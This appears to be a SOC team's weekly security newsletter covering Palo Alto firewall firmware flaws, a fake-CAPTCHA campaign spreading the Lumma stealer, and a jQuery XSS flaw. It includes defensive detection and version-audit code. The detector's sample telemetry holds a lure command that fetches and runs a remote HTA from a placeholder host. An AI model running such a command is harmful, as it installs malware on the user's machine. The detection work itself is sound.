Issue 50: Critical Palo Alto Firewall Flaws, Fake CAPTCHAs and jQuery XSS Exploit. Are You at Risk?


Top stories 31 Jan 2025:

  • Critical Flaws Discovered in Palo Alto Firewalls
  • Fake CAPTCHA Pages Fuel Global Attack Campaign
  • CISA Adds Five-Year-Old jQuery XSS Flaw to KEV List


Welcome back to Critical Chatter, your weekly round-up of current cybersecurity threats, vulnerabilities and active exploits, curated by your humble SOC team.



Critical Flaws Discovered in Palo Alto Firewalls

Security vendor Eclypsium found multiple vulnerabilities in Palo Alto Networks firewalls (PA-3260, PA-1410, and PA-415). These flaws, collectively named PANdora's Box, could allow attackers to bypass Secure Boot and modify firmware.


Vulnerabilities include:

  • BootHole (CVE-2020-10713) affects all three models, enabling Secure Boot bypass.
  • Multiple SMM vulnerabilities (CVE-2022-24030, CVE-2021-33627, CVE-2021-42060, CVE-2021-42554, CVE-2021-43323, and CVE-2021-45970) affect the PA-3260, potentially leading to privilege escalation.
  • LogoFAIL also affects the PA-3260, bypassing Secure Boot.
  • PixieFail affects the PA-1410 and PA-415, potentially allowing code execution.
  • An insecure flash access control vulnerability and CVE-2023-1017 affect the PA-415.
  • An Intel bootguard bypass affects the PA-1410.


CloudGuard recommends:

Exploitation requires prior PAN-OS compromise and elevated privileges; the risk can be mitigated by upgrading to the latest version of PAN-OS.


Palo Alto Networks are working on firmware updates for the InsydeH2O vulnerabilities for affected models.


TLDR; Eclypsium discovered multiple vulnerabilities in Palo Alto firewalls that could allow attackers to bypass Secure Boot and exploit firmware. Users should upgrade to the latest PAN-OS version for mitigation.


Fake CAPTCHA Pages Fuel Global Attack Campaign

A new global malware campaign distributes the Lumma information stealer via fake CAPTCHA verification pages. Netskope Threat Labs has tracked victims across multiple sectors, including healthcare, banking, marketing and telecoms, in countries such as Argentina, Colombia, the US and the Philippines.


The attack starts when victims visit a compromised site that redirects them to a counterfeit CAPTCHA page. Here, the user is instructed to copy and paste a command into the Windows Run prompt, which downloads and executes a malicious HTA file. This file then uses PowerShell to download and execute further payloads, ultimately deploying the Lumma Stealer. The attacker also bypasses Windows Antimalware Scan Interface (AMSI) protections, making it harder for security tools to catch the attack.
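The chain above (Run prompt, then mshta.exe fetching a remote HTA, then PowerShell as a child of mshta) is visible in ordinary process-creation telemetry. Below is an added detection example written for this newsletter, not code from Netskope or The Hacker News. The event field names (pid, parentPid, image, parentImage, commandLine) are assumptions loosely modelled on Sysmon Event ID 1, and the sample events are constructed; adapt both to your own telemetry schema.

```javascript
// Added example: two simple rules over process-creation events that surface the
// fake-CAPTCHA chain described above. Field names are assumptions (Sysmon-like);
// the sample telemetry at the bottom is constructed.

const REMOTE_URL = /\bhttps?:\/\/\S+/i;

// Last path component, lower-cased, so "C:\Windows\System32\mshta.exe" -> "mshta.exe".
function basename(path) {
  return path.split(/[\\/]/).pop().toLowerCase();
}

// Rule 1: mshta.exe launched from the shell (explorer.exe, which is what the Run
// prompt uses) with a remote URL on the command line. Legitimate HTAs are almost
// always local files, so this is a strong signal for the "paste this into Run" lure.
function isMshtaFromShellWithUrl(ev) {
  return basename(ev.image) === "mshta.exe"
    && basename(ev.parentImage) === "explorer.exe"
    && REMOTE_URL.test(ev.commandLine);
}

// Rule 2: a PowerShell process whose parent is mshta.exe, i.e. the HTA stage
// launching the next stage. Reporting both rules lets the analyst see the lure
// and the loader as one chain.
function isPowershellChildOfMshta(ev, byPid) {
  const parent = byPid.get(ev.parentPid);
  return ["powershell.exe", "pwsh.exe"].includes(basename(ev.image))
    && parent !== undefined
    && basename(parent.image) === "mshta.exe";
}

// Runs both rules over a batch of events and returns the findings in event order.
function detectFakeCaptchaChain(events) {
  const byPid = new Map(events.map(ev => [ev.pid, ev]));
  const findings = [];
  for (const ev of events) {
    if (isMshtaFromShellWithUrl(ev)) {
      findings.push({ pid: ev.pid, rule: "mshta_remote_hta_from_run_prompt" });
    }
    if (isPowershellChildOfMshta(ev, byPid)) {
      findings.push({ pid: ev.pid, rule: "powershell_spawned_by_mshta" });
    }
  }
  return findings;
}

// Constructed sample telemetry: a benign local HTA (pid 2100) and one suspicious
// chain (pids 3100 and 3200). The domain is a placeholder, not a real indicator.
const SAMPLE_EVENTS = [
  { pid: 1000, parentPid: 1, image: "C:\\Windows\\explorer.exe",
    parentImage: "C:\\Windows\\System32\\userinit.exe", commandLine: "explorer.exe" },
  { pid: 2100, parentPid: 1000, image: "C:\\Windows\\System32\\mshta.exe",
    parentImage: "C:\\Windows\\explorer.exe", commandLine: "mshta.exe C:\\Tools\\inventory.hta" },
  { pid: 3100, parentPid: 1000, image: "C:\\Windows\\System32\\mshta.exe",
    parentImage: "C:\\Windows\\explorer.exe", commandLine: "mshta http://captcha-verify.example/check.hta" },
  { pid: 3200, parentPid: 3100, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parentImage: "C:\\Windows\\System32\\mshta.exe", commandLine: "powershell.exe -NoProfile -Command <stage-2 redacted>" },
];

console.log(detectFakeCaptchaChain(SAMPLE_EVENTS));
```

Rule 1 deliberately ignores HTAs opened from local paths, so an admin running an internal inventory tool does not trip it; rule 2 keys on the parent/child relationship rather than on command-line keywords, which the AMSI-evading stage the text mentions is designed to obscure.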


Source: thehackernews
Malware-as-a-Service (MaaS) is a business model under which cybercriminals provide access to malicious software and related infrastructure for a fee.


Lumma (a malware-as-a-service) has also been spread via fake Reddit and WeTransfer domains using a SelfAU3 Dropper, and similar tactics have pushed other stealers like Vidar. A Phishing-as-a-Service toolkit, Tycoon 2FA, has also been updated with evasion techniques, including using compromised email accounts and anti-analysis measures.


Gravatar profiles are also being abused in social engineering attacks to mimic legitimate services like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail for credential harvesting.


TLDR; A fake CAPTCHA campaign is distributing the Lumma Stealer malware across various sectors, using social engineering and malicious scripts to bypass security defences.



CISA Adds Five-Year-Old jQuery XSS Flaw to KEV List

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2020-11023 (CVSS: 6.1/6.9), a medium-severity cross-site scripting (XSS) vulnerability in jQuery, to its Known Exploited Vulnerabilities catalogue.


This nearly five-year-old flaw allows arbitrary code execution if HTML containing <option> elements from untrusted sources is passed to jQuery's DOM manipulation methods, even after sanitisation.


The issue was first addressed in jQuery version 3.5.0, released in April 2020. For those still using older versions, CISA recommends sanitising the HTML string with a tool such as DOMPurify, whose SAFE_FOR_JQUERY flag provides a workaround, before passing the HTML to jQuery methods.
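Because the fix is a version bump, the first practical step is knowing which copies of jQuery below 3.5.0 are still served from your web assets. The following is an added inventory check written for this newsletter, not code from CISA or the jQuery project. It reads the build banner jQuery ships at the top of its files, compares the version numerically against 3.5.0, and reports each copy; the sample files are constructed, and the `files` map is an assumed input shape (path to contents) that a real run would fill from disk.

```javascript
// Added example: flag jQuery builds older than 3.5.0 (the release that addressed
// CVE-2020-11023) by reading the banner comment in each file. Sample files are constructed.

const FIXED_VERSION = "3.5.0";

// Matches both banner styles jQuery uses:
//   minified:   "/*! jQuery v1.12.4 | (c) jQuery Foundation ..."
//   unminified: "/*!\n * jQuery JavaScript Library v3.7.1\n ..."
const JQUERY_BANNER = /\/\*!\s*(?:\*\s*)?jQuery(?:\s+JavaScript\s+Library)?\s+v(\d+\.\d+\.\d+)/i;

function parseVersion(v) {
  return v.split(".").map(Number);
}

// Numeric comparison of dotted versions: returns -1, 0 or 1. A plain string
// compare would wrongly rank "3.10.0" below "3.5.0".
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Returns the banner version string, or null when the file is not a jQuery build.
function extractJqueryVersion(source) {
  const m = JQUERY_BANNER.exec(source);
  return m ? m[1] : null;
}

// Audits a { path: contents } map and reports every jQuery copy with a verdict.
function auditJquery(files) {
  const report = [];
  for (const [path, source] of Object.entries(files)) {
    const version = extractJqueryVersion(source);
    if (version === null) continue; // application code, not a jQuery build
    report.push({
      path,
      version,
      vulnerable: compareVersions(version, FIXED_VERSION) < 0,
    });
  }
  return report;
}

// Constructed sample inputs: one pre-fix copy, two fixed copies, one unrelated file.
const SAMPLE_FILES = {
  "static/js/jquery-1.12.4.min.js":
    "/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */\n!function(a,b){/* ... */}",
  "static/js/jquery.min.js":
    "/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */\n!function(e,t){/* ... */}",
  "static/js/jquery-3.7.1.js":
    "/*!\n * jQuery JavaScript Library v3.7.1\n * https://jquery.com/\n */",
  "static/js/app.js":
    "$(function () { $('#out').text('ready'); });",
};

console.log(auditJquery(SAMPLE_FILES));
```

Copies the audit marks `vulnerable: true` should be upgraded; where that is not immediately possible, the text above gives the interim control: pass untrusted HTML through DOMPurify with the SAFE_FOR_JQUERY flag before handing it to jQuery's DOM manipulation methods.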


The CISA advisory doesn't go into specifics about the ongoing exploitation or identify the threat actors involved, but there have been reports of attacks tied to advanced persistent threat (APT) groups such as APT1 (Brown Fox, Comment Panda) and APT27 (Brown Worm, Emissary Panda). EclecticIQ also linked vulnerable jQuery versions to Ivanti appliance exploits.


Federal Civilian Executive Branch (FCEB) agencies should remediate this flaw by 13 February 2025, in compliance with Binding Operational Directive (BOD) 22-01.


TLDR; CISA has added a medium-severity XSS vulnerability in jQuery to its Known Exploited Vulnerabilities list, warning of continued exploitation and recommending updates to address the flaw.


You may also be interested in...

Chairman and CEO Satya Nadella speaks at Microsoft Ignite 2024.

Read it here: Unpacking what Microsoft’s agentic AI announcements mean for cybersecurity in 2025


That's all folks!

Thank you for reading Critical Chatter, CloudGuard’s weekly roundup of security articles curated by Guardians. This week’s news flash has been curated by Vaughan Carey (SOC Leader).


If you like what you've read, subscribe so you don't miss next week's roundup.

